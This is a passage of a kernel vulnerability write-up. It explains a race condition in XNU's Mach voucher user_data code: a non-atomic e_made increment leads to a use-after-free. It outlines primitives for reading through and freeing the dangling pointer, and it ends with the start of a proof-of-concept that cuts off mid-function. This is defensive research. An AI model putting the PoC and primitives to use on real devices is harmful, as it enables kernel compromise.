                return KERN_INVALID_ARGUMENT;

        }

}

Let's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:

static user_data_element_t

user_data_dedup(

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size)

{

        iv_index_t sum;

        iv_index_t hash;

        user_data_element_t elem;

        user_data_element_t alloc = NULL;

        sum = user_data_checksum(content, content_size);

        hash = USER_DATA_HASH_BUCKET(sum);

retry:

        user_data_lock();

        queue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {

                assert(elem->e_hash == hash);

                /* if sums match... */

                if (elem->e_sum == sum && elem->e_size == content_size) {

                        iv_index_t i;

                        /* and all data matches */

                        for (i = 0; i < content_size; i++) {

                                if (elem->e_data[i] != content[i]) {

                                        break;

                                }

                        }

                        if (i < content_size) {

                                continue;

                        }

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

                        if (NULL != alloc) {

                                kfree(alloc, sizeof(*alloc) + content_size);

                        }

                        return elem;

                }

        }

        if (NULL == alloc) {

                user_data_unlock();

                alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);

                alloc->e_made = 1;

                alloc->e_size = content_size;

                alloc->e_sum = sum;

                alloc->e_hash = hash;

                memcpy(alloc->e_data, content, content_size);

                goto retry;

        }

        queue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);

        user_data_unlock();

        return alloc;

}

The user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:

struct user_data_value_element {

        mach_voucher_attr_value_reference_t     e_made;

        mach_voucher_attr_content_size_t        e_size;

        iv_index_t                              e_sum;

        iv_index_t                              e_hash;

        queue_chain_t                           e_hash_link;

        uint8_t                                 e_data[];

};

Pointers to those elements are stored in the user_data_bucket hash table.

user_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.
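
To make the shape of that dance concrete, here is a minimal user-space sketch of the same drop-the-lock-to-allocate-then-recheck pattern, using pthreads, malloc and a single linked list in place of the kernel's lock, kalloc and hash buckets. The names (cache_lock, cache_head, cache_get_or_insert) are invented for illustration; user space is of course free to allocate while holding a mutex, so this only mirrors the structure of user_data_dedup, not its constraints:

#include <pthread.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical element type standing in for user_data_value_element. */
struct elem {
    struct elem *next;
    size_t       size;
    uint8_t      data[];
};

static pthread_mutex_t cache_lock = PTHREAD_MUTEX_INITIALIZER;
static struct elem    *cache_head;   /* stand-in for a single hash bucket */

/* Return an existing matching element or insert a new one, never
 * allocating while the lock is held -- the same shape as user_data_dedup. */
static struct elem *
cache_get_or_insert(const uint8_t *content, size_t len)
{
    struct elem *alloc = NULL;

retry:
    pthread_mutex_lock(&cache_lock);
    for (struct elem *e = cache_head; e != NULL; e = e->next) {
        if (e->size == len && memcmp(e->data, content, len) == 0) {
            pthread_mutex_unlock(&cache_lock);
            free(alloc);   /* a racing thread (or an earlier pass) won: discard our speculative allocation */
            return e;
        }
    }
    if (alloc == NULL) {
        /* no match and nothing pre-allocated: drop the lock, allocate, then search again */
        pthread_mutex_unlock(&cache_lock);
        alloc = malloc(sizeof(*alloc) + len);
        alloc->size = len;
        memcpy(alloc->data, content, len);
        goto retry;
    }
    /* still no match on the second pass: publish our allocation */
    alloc->next = cache_head;
    cache_head = alloc;
    pthread_mutex_unlock(&cache_lock);
    return alloc;
}

int main(void)
{
    const uint8_t payload[4] = { 0x41, 0x41, 0x41, 0x41 };
    struct elem *a = cache_get_or_insert(payload, sizeof(payload));
    struct elem *b = cache_get_or_insert(payload, sizeof(payload));
    return (a == b) ? 0 : 1;   /* identical content dedups to the same element */
}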

The e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.

If a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.

The first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well technically there's also nothing stopping it overflowing so it can also go down 1 in every 2^32 increments...)

Let's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:

The next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:

        /* TODO: value insertion from returned voucher */

        if (IV_NULL != new_value_voucher) {

                iv_release(new_value_voucher);

        }

Next, the code needs to wrap new_value in an ivace_entry and determine the index of that ivace_entry in the controller's table of values. This is done by ivace_reference_by_value:

        /*

         * Find or create a slot in the table associated

         * with this attribute value.  The ivac reference

         * is transferred to a new value, or consumed if

         * we find a matching existing value.

         */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

        iv_set(voucher, key_index, val_index);

/*

 * Look up the values for a given <key, index> pair.

 *

 * Consumes a reference on the passed voucher control.

 * Either it is donated to a newly-created value cache

 * or it is released (if we piggy back on an existing

 * value cache entry).

 */

static iv_index_t

ivace_reference_by_value(

        ipc_voucher_attr_control_t      ivac,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_flags_t          flag)

{

        ivac_entry_t ivace = IVACE_NULL;

        iv_index_t hash_index;

        iv_index_t index;

        if (IVAC_NULL == ivac) {

                return IV_UNUSED_VALINDEX;

        }

        ivac_lock(ivac);

restart:

        hash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);

        index = ivac->ivac_table[hash_index].ivace_index;

        while (index != IV_HASH_END) {

                assert(index < ivac->ivac_table_size);

                ivace = &ivac->ivac_table[index];

                assert(!ivace->ivace_free);

                if (ivace->ivace_value == value) {

                        break;

                }

                assert(ivace->ivace_next != index);

                index = ivace->ivace_next;

        }

        /* found it? */

        if (index != IV_HASH_END) {

                /* only add reference on non-persistent value */

                if (!ivace->ivace_persist) {

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

                }

                ivac_unlock(ivac);

                ivac_release(ivac);

                return index;

        }

        /* insert new entry in the table */

        index = ivac->ivac_freelist;

        if (IV_FREELIST_END == index) {

                /* freelist empty */

                ivac_grow_table(ivac);

                goto restart;

        }

        /* take the entry off the freelist */

        ivace = &ivac->ivac_table[index];

        ivac->ivac_freelist = ivace->ivace_next;

        /* initialize the new entry */

        ivace->ivace_value = value;

        ivace->ivace_refs = 1;

        ivace->ivace_made = 1;

        ivace->ivace_free = FALSE;

        ivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;

        /* insert the new entry in the proper hash chain */

        ivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;

        ivac->ivac_table[hash_index].ivace_index = index;

        ivac_unlock(ivac);

        /* donated passed in ivac reference to new entry */

        return index;

}

You'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.

If a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found then both its ivace_refs and ivace_made counts are incremented:

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

Finally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.

ivace_reference_by_value then calls iv_set to store that index into the correct slot in the voucher's iv_table, which is just a simple array index operation:

        iv_set(voucher, key_index, val_index);

static void

iv_set(ipc_voucher_t iv,

    iv_index_t key_index,

    iv_index_t value_index)

{

        assert(key_index < iv->iv_table_size);

        iv->iv_table[key_index] = value_index;

}

Our journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:

        if (KERN_SUCCESS == kr) {

                *new_voucher = iv_dedup(voucher);

I won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:

iv_dealloc(new_iv, FALSE);

The FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.

The final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.

(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)

Destruction

Although I did briefly hint at a vulnerability above we still haven't actually seen enough code to determine that that bug actually has any security consequences. This is where things get complicated ;-)

Let's start with the result of the situation we described above, where we created a voucher port with the following recipe:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

This will end up with the following data structures in the kernel:

voucher_port {

  ip_kobject = reference-counted pointer to the voucher

}

voucher {

  iv_refs = 1;

  iv_table[6] = reference-counted *index* into user_data controller's ivac_table

}

controller {

  ivace_table[index] =

    {

      ivace_refs = 1;

      ivace_made = 1;

      ivace_value = pointer to user_data_value_element

    }

}

user_data_value_element {

  e_made = 1;

  e_data[] = {0x41, 0x41, 0x41, 0x41}

}

Let's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.

We'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated iv_release will get called to drop its reference on the voucher. And if that was the last reference iv_release calls iv_dealloc and we'll pick up the code there:

void

iv_dealloc(ipc_voucher_t iv, boolean_t unhash)

iv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:

        for (i = 0; i < iv->iv_table_size; i++) {

                ivace_release(i, iv->iv_table[i]);

        }

Recall that the index in the iv_table is the "key index", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:

static void

ivace_release(

        iv_index_t key_index,

        iv_index_t value_index)

{

...

        ivgt_lookup(key_index, FALSE, &ivam, &ivac);

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(0 < ivace->ivace_refs);

        /* cant release persistent values */

        if (ivace->ivace_persist) {

                ivac_unlock(ivac);

                return;

        }

        if (0 < --ivace->ivace_refs) {

                ivac_unlock(ivac);

                return;

        }

First they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock, then calculate a pointer into the ivac's ivac_table to get a pointer to the ivac_entry corresponding to the value_index to be released.

If this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to "free" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:

        key = iv_index_to_key(key_index);

        assert(MACH_VOUCHER_ATTR_KEY_NONE != key);

        /*

         * if last return reply is still pending,

         * let it handle this later return when

         * the previous reply comes in.

         */

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

        /* claim releasing */

        ivace->ivace_releasing = TRUE;

iv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as "releasing". The code continues:

        value = ivace->ivace_value;

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

Note that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute managers release_value callback is called:

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

Here's the user_data ivam_release_value callback:

static kern_return_t

user_data_release_value(

        ipc_voucher_attr_manager_t              __assert_only manager,

        mach_voucher_attr_key_t                 __assert_only key,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_reference_t     sync)

{

        user_data_element_t elem;

        iv_index_t hash;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        elem = (user_data_element_t)value;

        hash = elem->e_hash;

        user_data_lock();

        if (sync == elem->e_made) {

                queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);

                user_data_unlock();

                kfree(elem, sizeof(*elem) + elem->e_size);

                return KERN_SUCCESS;

        }

        assert(sync < elem->e_made);

        user_data_unlock();

        return KERN_FAILURE;

}

Under the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.

Having looked at the semantics of user_data_release_value, let's look back at the callsite:

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

They grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)

Then things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?

If that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.

We need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_replace_voucher_value, where the user_data_value_element and ivace are actually allocated:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

We already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.

Firstly, ipc_replace_voucher_value itself isn't holding any locks. It does, however, hold a few references (e.g., on the ivac and ivam).

user_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that), and ivace_reference_by_value, which increments ivace->ivace_made, does that under the ivac lock.

e_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element, then we'll encounter one of the more complex situations outlined above where, in ivace_release, ivace_made is not equal to the user_data_value_element's e_made field. The reason that case gets special treatment is that it indicates there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.

Another way to view this is that it's a hack around not holding a lock across that window shown above.

With this insight we can start to unravel the "redrive" logic:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

                if (KERN_SUCCESS != kr) {

                        ivace->ivace_releasing = FALSE;

                        ivac_unlock(ivac);

                        return;

                }

        }

Let's take the first case:

made is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though its ref count has gone to zero it hasn't yet been removed by this thread from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)

There are then two distinct sub-cases:

1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)

We can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.

So what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.

If this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is nevertheless semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed, and we need to remove our thread's contribution to that; hence:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)

In this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE the racing thread, after decrementing ivace_refs back to zero encountered this:

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

and returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

You can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.

If we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.

The condition under which the other branch is taken is nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

In this case, the code again just sets ivace_releasing to FALSE and continues.

Put another way, what this comment is describing is exactly what happens when the racing thread was in the region marked WINDOW up above, which is after that thread had incremented e_made on the same user_data_value_element which this ivace has a pointer to in its ivace_value field, but before that thread had looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.

The bug

Hopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)

e_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

The only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

As mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.

If you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.

That means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.
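
If it helps to see that lost update in isolation, here is a minimal stand-alone demonstration (not XNU code) of two threads doing the same unlocked read-modify-write. The final count reliably falls short of the expected total, and every increment it falls short by is one that was swallowed exactly as described above:

#include <pthread.h>
#include <stdio.h>

#define ITERATIONS 1000000

static volatile unsigned int counter;   /* plays the role of e_made */

/* Each thread performs an unlocked read-modify-write, just like the
 * MACH_VOUCHER_ATTR_REDEEM path incrementing e_made without the user_data lock. */
static void *incrementer(void *arg)
{
    (void)arg;
    for (int i = 0; i < ITERATIONS; i++) {
        counter = counter + 1;   /* non-atomic: load, add, store */
    }
    return NULL;
}

int main(void)
{
    pthread_t a, b;
    pthread_create(&a, NULL, incrementer, NULL);
    pthread_create(&b, NULL, incrementer, NULL);
    pthread_join(a, NULL);
    pthread_join(b, NULL);

    /* Expected 2 * ITERATIONS; the shortfall is the number of lost updates. */
    printf("count = %u (expected %u)\n", counter, (unsigned int)(2 * ITERATIONS));
    return 0;
}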

But remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.

Let's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, thread A doesn't free the new_value which is still live on thread B's stack:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

And the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.

This is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.

So how can we make something bad happen? Well, let's assume that we successfully trigger the e_made non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! If, in the steady-state e_made is one less than ivace_made then we race two threads; thread A which is dropping the last ivace_ref and thread B which is attempting to revive it and thread B is in the WINDOW shown above then e_made gets incremented before ivace_made, but since e_made started out one lower than ivace_made (due to the successful earlier trigger of the non-atomic increment) then e_made is now exactly equal to ivace_made; the exact condition which indicates we cannot possibly be in the WINDOW shown above, and it's safe to free the user_data_value_element which is in fact live on thread B's stack!

Thread B then ends up with a revived ivace with a dangling ivace_value.

This gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.
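
As a rough illustration of the first primitive, reading back through the user_data attribute from user space would look something like the sketch below. This assumes the MIG-generated prototype for mach_voucher_extract_attr_content in <mach/mach_voucher.h> (a caller-supplied buffer plus an in/out size), and it only becomes interesting once the freed user_data_value_element has been reallocated with attacker-relevant contents:

#include <stdio.h>
#include <stdint.h>
#include <mach/mach.h>
#include <mach/mach_error.h>
#include <mach/mach_voucher.h>

/* Sketch: dump whatever the user_data attribute for this voucher now points at.
 * Assumed prototype: content is a caller-supplied buffer, size is in/out. */
static void dump_user_data_attr(mach_port_t voucher)
{
    uint8_t content[2048] = {0};
    mach_voucher_attr_content_size_t size = sizeof(content);

    kern_return_t kr = mach_voucher_extract_attr_content(
        voucher,
        MACH_VOUCHER_ATTR_KEY_USER_DATA,
        content,
        &size);
    if (kr != KERN_SUCCESS) {
        printf("extract failed: %s\n", mach_error_string(kr));
        return;
    }
    for (mach_voucher_attr_content_size_t i = 0; i < size; i++) {
        printf("%02x ", content[i]);
    }
    printf("\n");
}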

With the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.

Conclusions

It's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:

1) Just read the code

Possible, but this vulnerability is quite deep in the code. This would have been a marathon auditing effort to find and determine that it was exploitable. On the other hand this attack surface is reachable from every sandbox making vulnerabilities here very valuable and perhaps worth the investment.

2) Static lock-analysis tooling

This is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.

3) Dynamic lock-analysis tooling

Perhaps tools like ThreadSanitizer could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.

4) Race-condition fuzzer

It's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.

As to what technique was actually used, we don't know. As defenders we need to do a better job making sure that we invest even more effort in all of these possibilities and more.

PoC:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <pthread.h>

#include <mach/mach.h>

#include <mach/mach_voucher.h>

#include <atm/atm_types.h>

#include <voucher/ipc_pthread_priority_types.h>

// @i41nbeer

static mach_port_t

create_voucher_from_recipe(void* recipe, size_t recipe_size) {

    mach_port_t voucher = MACH_PORT_NULL;

    kern_return_t kr = host_create_mach_voucher(

            mach_host_self(),

            (mach_voucher_attr_raw_recipe_array_t)recipe,

            recipe_size,

            &voucher);

    if (kr != KERN_SUCCESS) {

        printf("failed to create voucher from recipe\n");

    }

    return voucher;

}

static void*

create_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    *template_size_out = recipe_size;

    return recipe;

}

static void*

create_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

   

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    mach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);

    recipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe2->command = MACH_VOUCHER_ATTR_REDEEM;

    *template_size_out = recipe_size;

    return recipe;

}

struct recipe_template_meta {

    void* recipe;

    size_t recipe_size;

};

struct recipe_template_meta single_recipe_template = {};

struct recipe_template_meta redeem_recipe_template = {};

int iter_limit = 100000;

void* s3threadfunc(void* arg) {

